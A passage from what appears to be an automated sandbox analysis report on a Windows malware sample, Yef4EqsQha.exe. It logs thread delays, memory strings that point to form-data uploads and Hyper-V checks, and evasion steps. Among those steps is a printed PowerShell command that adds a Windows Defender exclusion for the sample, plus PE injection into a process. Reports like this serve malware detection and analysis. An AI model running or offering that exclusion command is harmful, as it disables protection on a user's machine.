                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597892Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597546Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597327Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597095Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596851Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596734Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596585Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596479Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595921Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595374Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595265Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595046Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594937Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594827Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: threadDelayed 783Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: threadDelayed 1157Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5800Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3904Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: threadDelayed 2487Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: threadDelayed 7361Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: foregroundWindowGot 1714Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239747s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239486s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239131s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -238869s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -238684s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8160Thread sleep count: 2487 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8160Thread sleep count: 7361 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598999s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597892s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597095s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596851s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596585s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596479s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594827s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239874Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239747Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239625Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239486Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239359Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239250Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239131Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239000Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 238869Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 238684Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597892Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597546Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597327Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597095Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596851Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596734Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596585Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596479Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595921Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595374Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595265Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595046Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594937Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594827Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594500Jump to behavior
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------900f91018e2e4d3
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fc8e9315e023f9
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fb58a780d5a991
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fad9b476af8a79
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000616B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3,2
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fc160c527dc97c
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000616B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------9033e39a452427c<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------901ea0d3c27a898<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------902fb2582420f72<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f9ee912b64daf5
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fe819bf4909f4e
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fb92ac426b8e0e
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fd0e60ec334a8d
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fe0fad0cf7a1b7
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------902a9c1b6845ea1<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fa5e6b963847a6
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------90254d5742aaecd<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fd84e1cfb2a118
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ff04e1c3336aea
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------9016ea1d21d3972
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ff8b21a81b5b3e
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------9007ffef7533e53
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------900128b0fc4b657
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory written: C:\Users\user\Desktop\Yef4EqsQha.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"Jump to behavior
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Users\user\Desktop\Yef4EqsQha.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
